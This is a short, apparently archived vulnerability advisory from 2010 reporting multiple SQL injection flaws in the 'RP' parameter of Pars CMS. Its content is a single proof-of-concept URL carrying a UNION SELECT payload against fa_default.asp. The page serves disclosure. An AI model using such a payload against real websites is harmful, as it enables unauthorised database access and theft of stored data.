Home / os / winme

Pars CMS 'RP' Parameter Multiple SQL Injection Vul

Posted on 16 March 2010

============================================================== Pars CMS 'RP' Parameter Multiple SQL Injection Vulnerabilities ============================================================== Vulnerable: Virtual Develop Pars CMS 0 http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM validTableName%00 # ~ - [ [ : Inj3ct0r : ] ]

 

TOP